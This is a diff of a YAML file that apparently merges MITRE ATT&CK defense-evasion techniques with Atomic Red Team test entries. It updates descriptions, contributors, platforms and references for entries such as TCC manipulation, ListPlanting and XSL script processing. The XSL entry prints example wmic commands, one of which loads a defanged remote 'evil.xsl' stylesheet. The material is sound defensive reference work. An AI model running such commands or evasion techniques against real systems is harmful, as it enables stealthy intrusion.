-        while preventing a user prompt. For a system without System Integrity Protection
-        (SIP) enabled, adversaries have also manipulated the operating system to load
-        an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
-        TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
-        inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
-        into targeted applications with the desired TCC permissions.\n"
+      description: |+
+        Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+        When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+        Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -24310,6 +24598,8 @@ defense-evasion:
         phase_name: privilege-escalation
       x_mitre_contributors:
       - Marina Liang
+      - Wojciech Reguła @_r3ggi
+      - Csaba Fitzl @theevilbit of Kandji
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -24317,7 +24607,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - macOS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Modification'
@@ -24347,7 +24637,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.008:
     technique:
@@ -24393,7 +24682,7 @@ defense-evasion:
         description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
           Retrieved December 20, 2017.
         source_name: Chokepoint preload rootkits
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:26:31.766Z'
       name: Ptrace System Calls
       description: "Adversaries may inject malicious code into processes via ptrace
         (process trace) system calls in order to evade process-based defenses as well
@@ -24438,8 +24727,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1027.007:
     technique:
@@ -24484,7 +24771,7 @@ defense-evasion:
         To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
 
         Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-08-23T18:32:46.899Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Obfuscated Files or Information: Dynamic API Resolution'
       x_mitre_detection: ''
@@ -24498,7 +24785,6 @@ defense-evasion:
       - 'Process: OS API Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027.007
     atomic_tests:
     - name: Dynamic API Resolution-Ninja-syscall
@@ -24540,53 +24826,24 @@ defense-evasion:
         elevation_required: true
   T1055.015:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
-      type: attack-pattern
-      created: '2021-11-22T15:02:15.190Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1055.015
-        url: https://attack.mitre.org/techniques/T1055/015
-      - source_name: Microsoft List View Controls
-        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
-        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
-          January 4, 2022.
-      - source_name: Modexp Windows Process Injection
-        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
-        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
-          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
-          Retrieved November 15, 2021.'
-      - source_name: ESET InvisiMole June 2020
-        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
-        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
-          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-14T17:34:33.948Z'
       name: 'Process Injection: ListPlanting'
       description: "Adversaries may abuse list-view controls to inject malicious code
         into hijacked processes in order to evade process-based defenses as well as
         possibly elevate privileges. ListPlanting is a method of executing arbitrary
-        code in the address space of a separate live process. Code executed via ListPlanting
-        may also evade detection from security products since the execution is masked
-        under a legitimate process.\n\nList-view controls are user interface windows
-        used to display collections of items.(Citation: Microsoft List View Controls)
-        Information about an application's list-view settings are stored within the
-        process' memory in a <code>SysListView32</code> control.\n\nListPlanting (a
-        form of message-passing \"shatter attack\") may be performed by copying code
-        into the virtual address space of a process that uses a list-view control
-        then using that code as a custom callback for sorting the listed items.(Citation:
-        Modexp Windows Process Injection) Adversaries must first copy code into the
-        target process’ memory space, which can be performed various ways including
-        by directly obtaining a handle to the <code>SysListView32</code> child of
-        the victim process window (via Windows API calls such as <code>FindWindow</code>
+        code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+        Code executed via ListPlanting may also evade detection from security products
+        since the execution is masked under a legitimate process.\n\nList-view controls
+        are user interface windows used to display collections of items.(Citation:
+        Microsoft List View Controls) Information about an application's list-view
+        settings are stored within the process' memory in a <code>SysListView32</code>
+        control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+        be performed by copying code into the virtual address space of a process that
+        uses a list-view control then using that code as a custom callback for sorting
+        the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+        must first copy code into the target process’ memory space, which can be performed
+        various ways including by directly obtaining a handle to the <code>SysListView32</code>
+        child of the victim process window (via Windows API calls such as <code>FindWindow</code>
         and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
         methods.\n\nSome variations of ListPlanting may allocate memory in the target
         process but then use window messages to copy the payload, to avoid the use
@@ -24603,6 +24860,9 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - ESET
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitoring Windows API calls indicative of the various types
         of code injection may generate a significant amount of data and may not be
         directly useful for defense unless collected under specific circumstances
@@ -24617,16 +24877,47 @@ defense-evasion:
         arguments.\n\nAnalyze process behavior to determine if a process is performing
         unusual actions, such as opening network connections, reading files, or other
         suspicious actions that could relate to post-compromise behavior. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Modification'
       - 'Process: OS API Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+      created: '2021-11-22T15:02:15.190Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1055/015
+        external_id: T1055.015
+      - source_name: Hexacorn Listplanting
+        description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+          trick. Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+      - source_name: ESET InvisiMole June 2020
+        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+      - source_name: Microsoft List View Controls
+        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+          January 4, 2022.
+        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+      - source_name: Modexp Windows Process Injection
+        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+          Retrieved November 15, 2021.'
+        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1055.015
     atomic_tests:
     - name: Process injection ListPlanting
@@ -24666,7 +24957,7 @@ defense-evasion:
         elevation_required: true
   T1484:
     technique:
-      modified: '2024-04-19T04:27:31.884Z'
+      modified: '2024-10-15T15:55:32.946Z'
       name: Domain or Tenant Policy Modification
       description: "Adversaries may modify the configuration settings of a domain
         or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -24711,9 +25002,8 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '3.0'
+      - Identity Provider
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Deletion'
       - 'Active Directory: Active Directory Object Creation'
@@ -24770,8 +25060,8 @@ defense-evasion:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Sygnia Golden SAML
         description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
           Attack. Retrieved January 6, 2021.
@@ -24780,57 +25070,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1220:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Avneet Singh
-      - Casey Smith
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
-      created: '2018-10-17T00:14:20.652Z'
-      x_mitre_version: '1.2'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1220
-        url: https://attack.mitre.org/techniques/T1220
-      - source_name: Reaqta MSXSL Spearphishing MAR 2018
-        url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
-        description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
-          MSXSL. Retrieved July 3, 2018.
-      - source_name: Twitter SquiblyTwo Detection APR 2018
-        url: https://twitter.com/dez_/status/986614411711442944
-        description: Desimone, J. (2018, April 18). Status Update. Retrieved July
-          3, 2018.
-      - source_name: LOLBAS Wmic
-        url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
-        description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
-      - source_name: Microsoft msxsl.exe
-        url: https://www.microsoft.com/download/details.aspx?id=21714
-        description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
-          Retrieved July 3, 2018.
-      - source_name: Penetration Testing Lab MSXSL July 2017
-        url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
-        description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
-          July 3, 2018.
-      - source_name: XSL Bypass Mar 2019
-        url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
-        description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
-          Proxy Code Execution. Retrieved August 2, 2019.
-      - source_name: Microsoft XSLT Script Mar 2017
-        url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
-        description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
-          Using <msxsl:script>. Retrieved July 3, 2018.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-12T19:40:12.337Z'
+      name: XSL Script Processing
       description: |-
         Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
 
@@ -24848,29 +25092,73 @@ defense-evasion:
 
         * Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>
         * Remote File: <code>wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”</code>
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: XSL Script Processing
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Avneet Singh
+      - Casey Smith
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
 
         The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
-      kill_chain_phases:
-      - phase_name: defense-evasion
-        kill_chain_name: mitre-attack
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
-      x_mitre_system_requirements:
-      - Microsoft Core XML Services (MSXML) or access to wmic.exe
       x_mitre_defense_bypassed:
       - Anti-virus
       - Digital Certificate Validation
       - Application Control
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_system_requirements:
+      - Microsoft Core XML Services (MSXML) or access to wmic.exe
+      type: attack-pattern
+      id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
+      created: '2018-10-17T00:14:20.652Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1220
+        external_id: T1220
+      - source_name: Reaqta MSXSL Spearphishing MAR 2018
+        description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
+          MSXSL. Retrieved July 3, 2018.
+        url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
+      - source_name: Twitter SquiblyTwo Detection APR 2018
+        description: Desimone, J. (2018, April 18). Status Update. Retrieved September
+          12, 2024.
+        url: https://x.com/dez_/status/986614411711442944
+      - source_name: LOLBAS Wmic
+        description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
+        url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
+      - source_name: Microsoft msxsl.exe
+        description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
+          Retrieved July 3, 2018.
+        url: https://www.microsoft.com/download/details.aspx?id=21714
+      - source_name: Penetration Testing Lab MSXSL July 2017
+        description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
+          July 3, 2018.
+        url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
+      - source_name: XSL Bypass Mar 2019
+        description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
+          Proxy Code Execution. Retrieved August 2, 2019.
+        url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
+      - source_name: Microsoft XSLT Script Mar 2017
+        description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
+          Using <msxsl:script>. Retrieved July 3, 2018.
+        url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1220
     atomic_tests:
     - name: MSXSL Bypass using local files
@@ -25059,7 +25347,7 @@ defense-evasion:
         description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
           Retrieved July 10, 2017.'
         source_name: WireLurker
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T22:32:25.985Z'
       name: 'Hide Artifacts: Hidden Files and Directories'
       description: |-
         Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls –a</code> for Linux and macOS).
@@ -25087,8 +25375,6 @@ defense-evasion:
       - Host forensic analysis
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1564.001
     atomic_tests:
     - name: Create Windows System File with Attrib
@@ -25238,42 +25524,7 @@ defense-evasion:
         elevation_required: true
   T1578.001:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
-      type: attack-pattern
-      created: '2020-06-09T15:33:13.563Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.001
-        url: https://attack.mitre.org/techniques/T1578/001
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS Cloud Trail Backup API
-        url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
-        description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
-          Retrieved April 27, 2020.
-      - source_name: Azure - Monitor Logs
-        url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
-        description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
-          Retrieved May 1, 2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      - source_name: GCP - Creating and Starting a VM
-        url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
-        description: Google. (2020, April 23). Creating and Starting a VM instance.
-          Retrieved May 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:53:44.870Z'
       name: Create Snapshot
       description: |-
         An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
@@ -25282,6 +25533,9 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
 
@@ -25290,20 +25544,51 @@ defense-evasion:
         In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
 
         Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the <code>gcloud compute instances create</code> command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the <code>"sourceSnapshot":</code> parameter pointed to <code>"global/snapshots/[BOOT_SNAPSHOT_NAME]</code>.(Citation: GCP - Creating and Starting a VM)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Snapshot: Snapshot Creation'
       - 'Snapshot: Snapshot Metadata'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
+      created: '2020-06-09T15:33:13.563Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/001
+        external_id: T1578.001
+      - source_name: AWS Cloud Trail Backup API
+        description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
+          Retrieved April 27, 2020.
+        url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
+      - source_name: GCP - Creating and Starting a VM
+        description: Google. (2020, April 23). Creating and Starting a VM instance.
+          Retrieved May 1, 2020.
+        url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure - Monitor Logs
+        description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
+          Retrieved May 1, 2020.
+        url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1550.001:
     technique:
-      modified: '2024-04-12T21:18:28.848Z'
+      modified: '2024-10-15T15:38:11.583Z'
       name: Application Access Token
       description: "Adversaries may use stolen application access tokens to bypass
         the typical authentication process and access restricted accounts, information,
@@ -25360,6 +25645,7 @@ defense-evasion:
       - Dylan Silva, AWS Security
       - Jack Burns, HubSpot
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
         granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -25370,13 +25656,12 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - Containers
       - IaaS
-      - Azure AD
-      x_mitre_version: '1.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       x_mitre_defense_bypassed:
@@ -25435,11 +25720,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -25479,8 +25763,10 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -25488,13 +25774,13 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -25525,9 +25811,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1480.001:
@@ -25588,7 +25871,7 @@ defense-evasion:
         Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
 
         Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-04T14:52:51.290Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Environmental Keying
       x_mitre_detection: Detecting the use of environmental keying may be difficult
@@ -25610,11 +25893,10 @@ defense-evasion:
       - Static File Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
